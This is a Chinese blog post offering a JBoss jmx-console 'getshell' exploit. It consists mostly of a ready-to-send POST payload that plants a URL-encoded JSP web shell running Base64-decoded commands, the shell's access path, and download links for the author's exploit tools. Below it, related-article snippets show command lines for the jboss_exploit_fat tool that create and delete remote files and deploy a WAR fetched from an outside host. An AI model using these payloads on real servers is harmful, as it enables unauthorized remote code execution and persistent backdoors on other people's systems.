[原创]K8 Jboss jmx-console getshell exploit

最新推荐文章于 2024-08-07 13:46:25 发布
最新推荐文章于 2024-08-07 13:46:25 发布
阅读量537 收藏
点赞数
分类专栏: 工具 原创 文章标签: exploit getshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/k8gege/article/details/89266150
版权
本文介绍了如何利用K8s环境中Jboss的JMX-Console进行getshell攻击,包括手动和一键利用方法,并提供了相关EXP下载链接。利用工具包括K8飞刀和HackIE,以及CmdShell管理。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[原创]K8 Jboss jmx-console getshell exploit

https://www.cnblogs.com/k8gege/p/10645858.html

 

0x00 前言

今天内网遇到几台Jboss,使用MSF确实是有点烦,要打几条命令设置一堆参数,我一个粘贴搞定的

为什么非要使用手动打好几条命令,让外行人看起来牛逼吗?大家都知道黑客电影打字快并不是高手

那些水平不是很高的才一整天在外行人面前说,我用Linux系统我用MSF等等,用Linux并不会高人一等

Windows下也有一堆命令,懂CMD去用Linux也一样很简单,再说Linux一样有界面的,没什么好装的。

难道我会告诉你们我最虚拟机里用XP系统吗??OK,废话不多说,上道具,不对拿枪上好子弹开炮!

 

0x001 手动版 (提供子弹payload)

K8飞刀---漏洞调式/HackIE---POST提交(你也可以把子弹装到其它枪上)
目标: url + /jmx-console/HtmlAdaptor

提交数据

action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=jbossjdk.war&argType=java.lang.String&arg1=jbossjdk&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%3c%25%40%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6f%72%67%2e%6a%62%6f%73%73%2e%75%74%69%6c%2e%42%61%73%65%36%34%22%25%3e%3c%25%74%72%79%20%7b%53%74%72%69%6e%67%20%63%6d%64%20%3d%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%74%6f%6d%22%29%3b%53%74%72%69%6e%67%20%70%61%74%68%3d%61%70%70%6c%69%63%61%74%69%6f%6e%2e%67%65%74%52%65%61%6c%50%61%74%68%28%72%65%71%75%65%73%74%2e%67%65%74%52%65%71%75%65%73%74%55%52%49%28%29%29%3b%53%74%72%69%6e%67%20%64%69%72%3d%6e%65%77%20%46%69%6c%65%28%70%61%74%68%29%2e%67%65%74%50%61%72%65%6e%74%28%29%3b%69%66%28%63%6d%64%2e%65%71%75%61%6c%73%28%22%4e%7a%55%31%4e%67%22%29%29%7b%6f%75%74%2e%70%72%69%6e%74%28%22%5b%53%5d%22%2b%64%69%72%2b%22%5b%45%5d%22%29%3b%7d%53%74%72%69%6e%67%20%78%78%63%6d%64%20%3d%20%6e%65%77%20%53%74%72%69%6e%67%28%42%61%73%65%36%34%2e%64%65%63%6f%64%65%28%63%6d%64%29%29%3b%50%72%6f%63%65%73%73%20%63%68%69%6c%64%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%78%78%63%6d%64%29%3b%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%63%68%69%6c%64%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%6f%75%74%2e%70%72%69%6e%74%28%22%2d%3e%7c%22%29%3b%69%6e%74%20%63%3b%77%68%69%6c%65%20%28%28%63%20%3d%20%69%6e%2e%72%65%61%64%28%29%29%20%21%3d%20%2d%31%29%20%7b%6f%75%74%2e%70%72%69%6e%74%28%28%63%68%61%72%29%63%29%3b%7d%69%6e%2e%63%6c%6f%73%65%28%29%3b%6f%75%74%2e%70%72%69%6e%74%28%22%7c%3c%2d%22%29%3b%74%72%79%20%7b%63%68%69%6c%64%2e%77%61%69%74%46%6f%72%28%29%3b%7d%20%63%61%74%63%68%20%28%49%6e%74%65%72%72%75%70%74%65%64%45%78%63%65%70%74%69%6f%6e%20%65%29%20%7b%65%2e%70%72%69%6e%74%53%74%61%63%6b%54%72%61%63%65%28%29%3b%7d%7d%20%63%61%74%63%68%20%28%49%4f%45%78%63%65%70%74%69%6f%6e%20%65%29%20%7b%53%79%73%74%65%6d%2e%65%72%72%2e%70%72%69%6e%74%6c%6e%28%65%29%3b%7d%25%3e&argType=boolean&arg4=True

 

0x002 一键版(枪已上好弹药,向目标开炮吧)

exp分为两个版本,一个是独立的EXP,另一个已通过HackIE将payload加入K8飞刀漏洞库中,填写网址即可。

K8飞刀GetShell成功返回如下页面

0x003  CmdShell管理

成功后使用K8cmd来管理(无需尝试其它工具仅飞刀可连),再怎样也比MSF反弹后执行命令方便吧

cmdshell: url+/jbossjdk/jbossjdk.jsp tom

 

0x004 下载

独立EXP:https://github.com/k8gege/K8tools/blob/master/K8_JbossExp.exe

飞刀EXP:https://github.com/k8gege/K8tools/blob/master/K8data.mdb

另外一个: https://github.com/k8gege/JbossExploit

二十八种未授权访问漏洞合集(暂时最全)
墨痕诉清风的博客
01-04 5195
目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 0x06 Dubbo 未授权访问 0x07 Druid 未授权访问 0x08 Elasticsearch 未授权访问 0x09 FTP 未授权访问 0x10 HadoopYARN 未授权访问 0x11 JBoss 未授权访问 0x12 Jenkins 未授权访问 0x13 Jupyt
jboss_exploit_fat
09-06
1. 查看系统名称 java -jar jboss_exploit_fat.jar -i http://123.232.119.98:9009/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSName 2. 查看系统版本 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet get jboss.system:type=ServerInfo OSVersion 3.远程创建文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository store myname.war index .jsp $content$ true -s java.lang.String;java.lang.String;java.lang.String;java.lang.String;java.lang.Boolean $content$内容是同目录下的shell.jsp文件内容 即:将shell.jsp文件上传到服务器上,最终部署的war访问: http://192.168.7.84:10081/myname/index.jsp 如果有mynameok 表示部署成功 使用client.htm客户端进行连接即可(需要修改ip等信息) 4.远程部署war java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.system:service=MainDeployer deploy http://scriptsgenie.com/demo/test.war 获得shell地址: http://192.168.7.84:10081/test/shell.jsp 5.远程删除文件D:\jboss\server\default\deploy\management\myname.war\index.jsp文件 java -jar jboss_exploit_fat.jar -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 6.支持输入用户名和密码 带验证的情况 java -jar jboss_exploit_fat.jar -u name -p password -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp 7.支持代理模式 java -jar jboss_exploit_fat.jar -P http://127.0.0.1:8080 -i http://192.168.7.84:10081/invoker/JMXInvokerServlet invoke jboss.admin:service=DeploymentFileRepository remove myname index .jsp
Jboss 4.x版本jmx-console控制台弱口令getshell
来到了学渣的博客
08-31 2838
总结: 1.发现jboss4.0,尝试弱口令,成功 2.直接访问ip/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL 3.void addurl中的Param Value中插入公网部署好的war包 4.返回第二步,并点击apply changes 5.查看jmx-console目录下如果有部署war包的名字证明上传成功 6.ip/wa
Jboss未授权访问getshellJMX-Console
weixin_51151498的博客
12-10 1271
Jboss未授权访问getshellJMX-Console
[EXP]K8 jboss invoke deploy getshell exploit
weixin_30731305的博客
03-01 1175
MSF jboss invoke deploy EXPLOIT moudle Date:2013.11.28 Author:K8gege 改这个EXP中 过程有点不进人意 没能在一个payload里直接输出小马无奈只能分成了6步来执行,长度有限制 只能一次写入一段内容。以追加方式写入 最后才构造出 JSP 小马... 用法BT5 MSF 下 JBOSS EXP存放路径 把这几个脚本丢到这...
【漏洞复现】JBoss 中间件漏洞
qq_48368964的博客
08-06 1550
JBoss是⼀个基于J2EE的开发源代码的应⽤服务器。JBoss代码遵循LGPL许可,可以在任何商业应⽤中免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域,JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss⼴为流⾏。
JBoss EXP exploit工具使用方法与实例解析
这条命令通过调用JBossJMX Invoker Servlet接口,执行`get`操作,获取系统名称。攻击者可通过此命令检测目标JBoss服务器的操作系统类型。 - **查看系统版本** `java -jar jboss_exploit_fat.jar -i ...
常见中间件漏洞复现之【Jboss】!
muyuchen110的博客
08-06 1105
Jboss介绍JBoss是⼀个基于J2EE的开发源代码的应⽤服务器。JBoss代码遵循LGPL许可,可以在任何商业应⽤中免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域,JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss⼴为流⾏。漏洞介绍影响范围。
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1778
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
很厉害的K8飞刀
02-23
很厉害的K8飞刀!K8fly.exe
K8飞刀2016
01-19
K8飞刀2016
Jboss漏洞利用小工具
09-01
Jboss漏洞利用的小工具。执行命令一次不行可以尝试多次执行
Java反序列化漏洞利用工具(WebLogic&Jboss
01-01
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如Url填写清楚,IP地址写对了,报错或者抛异常神马的别怪我,调输入校验好蛋疼。 本工具与网上已公布工具优点: 1. 综合实现网上公布的代码执行、反弹 2. jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试中,稍后加入
JBoss未授权访问漏洞Getshell过程复现
道阻且长,行则将至
06-21 3845
文章目录前言漏洞复现漏洞描述靶场搭建漏洞利用防御手段Jexboss脚本 前言 在 2021 年第五届强网杯全国网络安全挑战赛的 EasyWeb 赛题中遇到了 JBoss 未授权访问漏洞 GetShell 的漏洞场景(2021强网杯全国网络安全挑战赛Writeup),当时一脸懵圈,故在此进行学习记录下。 漏洞复现 JBoss 是一个管理 EJB 的容器和服务器,支持 EJB 1.1、EJB 2.0 和 EJB3 的规范。但 JBoss 核心服务不包括支持 servlet/JSP 的 WEB 容器,一般与 To
Jboss漏洞(⾼版本JMX Console未授权)
最新发布
qq_68186313的博客
08-07 321
JMX Console默认存在未授权访问,直接点击JBoss主⻚中的 JMX Console 链接进⼊JMX Console⻚ ⾯, 通过部署war包 , getshell。2、进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏ 远程部署。3、然后输⼊Invoke。
jboss历史漏洞利用
weixin_53665691的博客
01-23 617
jboss漏洞利用
JBoss漏洞 - CVE-2007-1036
HAKUNAMATATATTA的博客
12-12 2993
此漏洞主要是由于JBoss中 /jmx-console/HtmlAdaptor 路径对外开放,并且没有任何身份验证机制,导致攻击者可以进入到jmx控制台,并在其中执行任何功能。该漏洞利用的是后台中 jboss.admin ->DeploymentFileRepository -> store() 方法,通过向四个参数传入信息,达到上传shell的目的,其中arg0传入的是部署的war包名字,arg1传入的是上传的文件的文件名,arg2传入的是上传文件的文件格式,arg3传入的是上传文件中的内容。
android通过webview调起支付宝app支付
热门推荐
Jaelyn的博客
11-22 2万+
android通过webview调起支付宝app支付
Jboss 3.2.2 JMX-console 安全配置详解:用户名密码验证与设置步骤
Jboss控制台jmx-console的安全设置涉及到部署位置、web.xml和jboss-web.xml的配置、用户与角色管理以及登录验证机制的完善。通过遵循这些步骤,可以有效地增强Jboss服务器对jmx-console的访问控制,保护系统免受未经...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值